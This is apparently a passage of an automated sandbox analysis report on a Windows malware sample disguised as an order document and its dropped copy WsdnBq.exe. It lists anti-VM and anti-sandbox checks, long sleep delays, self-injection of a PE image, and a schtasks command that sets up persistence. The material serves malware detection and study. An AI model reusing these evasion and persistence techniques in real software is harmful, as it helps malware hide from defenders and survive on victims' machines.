        Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\WsdnBq.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\WsdnBq.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\WsdnBq.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\WsdnBq.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\WsdnBq.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\WsdnBq.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\WsdnBq.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\WsdnBq.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\WsdnBq.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\WsdnBq.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\WsdnBq.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\WsdnBq.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\WsdnBq.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\WsdnBq.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\WsdnBq.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\WsdnBq.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\WsdnBq.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\WsdnBq.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\WsdnBq.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\WsdnBq.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\WsdnBq.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\WsdnBq.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\WsdnBq.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\WsdnBq.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\WsdnBq.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\WsdnBq.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\WsdnBq.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\WsdnBq.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\WsdnBq.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\WsdnBq.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\WsdnBq.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\WsdnBq.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\WsdnBq.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\WsdnBq.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\WsdnBq.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\WsdnBq.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\WsdnBq.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\WsdnBq.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\WsdnBq.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\WsdnBq.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\WsdnBq.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\WsdnBq.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\WsdnBq.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\WsdnBq.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\WsdnBq.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\WsdnBq.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\WsdnBq.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\WsdnBq.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\WsdnBq.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\WsdnBq.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\WsdnBq.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\WsdnBq.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\WsdnBq.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\WsdnBq.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\WsdnBq.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\WsdnBq.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\WsdnBq.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\WsdnBq.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\WsdnBq.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\WsdnBq.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\WsdnBq.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\WsdnBq.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\WsdnBq.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\WsdnBq.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\WsdnBq.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\WsdnBq.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\WsdnBq.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\WsdnBq.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\WsdnBq.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\WsdnBq.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\WsdnBq.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\WsdnBq.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\WsdnBq.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\WsdnBq.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\WsdnBq.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\WsdnBq.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\WsdnBq.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\WsdnBq.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\WsdnBq.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\WsdnBq.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\WsdnBq.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\WsdnBq.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\WsdnBq.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\WsdnBq.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\WsdnBq.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\WsdnBq.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\WsdnBq.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\WsdnBq.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\WsdnBq.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\WsdnBq.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\WsdnBq.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\WsdnBq.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\WsdnBq.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\WsdnBq.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\WsdnBq.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\WsdnBq.exeProcess information set: NOOPENFILEERRORBOX

        Malware Analysis System Evasion

        barindex
        Source: Yara matchFile source: Process Memory Space: ORDER (6256 OS)#391 PI.exe PID: 1688, type: MEMORYSTR
        Source: Yara matchFile source: Process Memory Space: WsdnBq.exe PID: 6004, type: MEMORYSTR
        Source: ORDER (6256 OS)#391 PI.exe, 00000000.00000002.338224910.0000000002FC1000.00000004.00000800.00020000.00000000.sdmp, WsdnBq.exe, 00000005.00000002.398697821.0000000002D41000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: WINE_GET_UNIX_FILE_NAME
        Source: ORDER (6256 OS)#391 PI.exe, 00000000.00000002.338224910.0000000002FC1000.00000004.00000800.00020000.00000000.sdmp, WsdnBq.exe, 00000005.00000002.398697821.0000000002D41000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: SBIEDLL.DLL
        Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
        Source: C:\Users\user\AppData\Roaming\WsdnBq.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
        Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
        Source: C:\Users\user\AppData\Roaming\WsdnBq.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
        Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe TID: 6024Thread sleep time: -3689348814741908s >= -30000s
        Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe TID: 4864Thread sleep count: 8986 > 30
        Source: C:\Users\user\AppData\Roaming\WsdnBq.exe TID: 5116Thread sleep time: -1844674407370954s >= -30000s
        Source: C:\Users\user\AppData\Roaming\WsdnBq.exe TID: 5064Thread sleep count: 8770 > 30
        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
        Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exeThread delayed: delay time: 922337203685477
        Source: C:\Users\user\AppData\Roaming\WsdnBq.exeThread delayed: delay time: 922337203685477
        Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exeWindow / User API: threadDelayed 8986
        Source: C:\Users\user\AppData\Roaming\WsdnBq.exeWindow / User API: threadDelayed 8770
        Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
        Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
        Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
        Source: C:\Users\user\AppData\Roaming\WsdnBq.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
        Source: C:\Users\user\AppData\Roaming\WsdnBq.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
        Source: C:\Users\user\AppData\Roaming\WsdnBq.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
        Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exeProcess information queried: ProcessInformation
        Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exeThread delayed: delay time: 922337203685477
        Source: C:\Users\user\AppData\Roaming\WsdnBq.exeThread delayed: delay time: 922337203685477
        Source: ORDER (6256 OS)#391 PI.exe, 00000000.00000003.333366002.0000000008D9A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\Device\CdRom0\??\Volume{e6e9dfd8-98f2-11e9-90ce-806e6f6e6963}\DosDevices\D:
        Source: WsdnBq.exe, 00000005.00000002.398697821.0000000002D41000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMware SVGA IIOData Source=localhost\sqlexpress;Initial Catalog=dbSMS;Integrated Security=True
        Source: WsdnBq.exe, 00000005.00000002.398697821.0000000002D41000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vmware
        Source: WsdnBq.exe, 00000005.00000002.398697821.0000000002D41000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
        Source: WsdnBq.exe, 00000005.00000002.398697821.0000000002D41000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: SOFTWARE\VMware, Inc.\VMware Tools
        Source: WsdnBq.exe, 00000005.00000002.398697821.0000000002D41000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMWARE
        Source: WsdnBq.exe, 00000005.00000002.398697821.0000000002D41000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: InstallPath%C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
        Source: WsdnBq.exe, 00000005.00000002.398697821.0000000002D41000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMWARE"SOFTWARE\VMware, Inc.\VMware ToolsLHARDWARE\DEVICEMAP\Scsi\Scsi Port 1\Scsi Bus 0\Target Id 0\Logical Unit Id 0LHARDWARE\DEVICEMAP\Scsi\Scsi Port 2\Scsi Bus 0\Target Id 0\Logical Unit Id 0'SYSTEM\ControlSet001\Services\Disk\Enum
        Source: WsdnBq.exe, 00000005.00000002.398697821.0000000002D41000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMware SVGA II
        Source: WsdnBq.exe, 00000005.00000002.398697821.0000000002D41000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vmwareNSYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000
        Source: WsdnBq.exe, 00000008.00000003.450250389.00000000015E6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
        Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exeProcess token adjusted: Debug
        Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exeProcess token adjusted: Debug
        Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exeMemory allocated: page read and write | page guard

        HIPS / PFW / Operating System Protection Evasion

        barindex
        Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exeMemory written: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe base: 400000 value starts with: 4D5A
        Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exeProcess created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe" /Create /TN "Updates\WsdnBq" /XML "C:\Users\user\AppData\Local\Temp\tmpF47D.tmp
        Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exeProcess created: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe {path}
        Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exeProcess created: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe {path}
        Source: C:\Users\user\AppData\Roaming\WsdnBq.exeProcess created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe" /Create /TN "Updates\WsdnBq" /XML "C:\Users\user\AppData\Local\Temp\tmp645E.tmp
        Source: C:\Users\user\AppData\Roaming\WsdnBq.exeProcess created: C:\Users\user\AppData\Roaming\WsdnBq.exe {path}
        Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exeQueries volume information: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe VolumeInformation
        Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
        Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
        Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
        Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
        Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exeQueries volume information: C:\Windows\Fonts\arial.ttf VolumeInformation
        Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exeQueries volume information: C:\Windows\Fonts\ariali.ttf VolumeInformation
        Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exeQueries volume information: C:\Windows\Fonts\arialbd.ttf VolumeInformation
        Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exeQueries volume information: C:\Windows\Fonts\arialbi.ttf VolumeInformation
        Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exeQueries volume information: C:\Windows\Fonts\ARIALN.TTF VolumeInformation
        Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exeQueries volume information: C:\Windows\Fonts\ariblk.ttf VolumeInformation
        Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exeQueries volume information: C:\Windows\Fonts\ARIALNI.TTF VolumeInformation
        Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exeQueries volume information: C:\Windows\Fonts\ARIALNB.TTF VolumeInformation
        Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exeQueries volume information: C:\Windows\Fonts\ARIALNBI.TTF VolumeInformation
        Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
        Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exeQueries volume information: C:\Windows\Fonts\calibri.ttf VolumeInformation
        Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exeQueries volume information: C:\Windows\Fonts\calibril.ttf VolumeInformation
        Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exeQueries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformation
        Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exeQueries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformation
        Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exeQueries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformation
        Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exeQueries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformation
        Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation
        Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exeQueries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformation
        Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exeQueries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformation
        Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exeQueries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformation
        Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exeQueries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformation
        Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exeQueries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformation
        Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exeQueries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformation
        Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exeQueries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformation
        Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exeQueries volume information: C:\Windows\Fonts\comic.ttf VolumeInformation
        Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exeQueries volume information: C:\Windows\Fonts\comici.ttf VolumeInformation
        Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exeQueries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformation
        Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exeQueries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformation
        Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exeQueries volume information: C:\Windows\Fonts\consola.ttf VolumeInformation
        Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exeQueries volume information: C:\Windows\Fonts\consolai.ttf VolumeInformation
        Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exeQueries volume information: C:\Windows\Fonts\consolab.ttf VolumeInformation
        Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exeQueries volume information: C:\Windows\Fonts\consolaz.ttf VolumeInformation
        Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exeQueries volume information: C:\Windows\Fonts\constan.ttf VolumeInformation
        Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exeQueries volume information: C:\Windows\Fonts\constani.ttf VolumeInformation
        Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exeQueries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformation
        Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exeQueries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformation
        Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exeQueries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformation
        Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exeQueries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformation
        Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exeQueries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformation
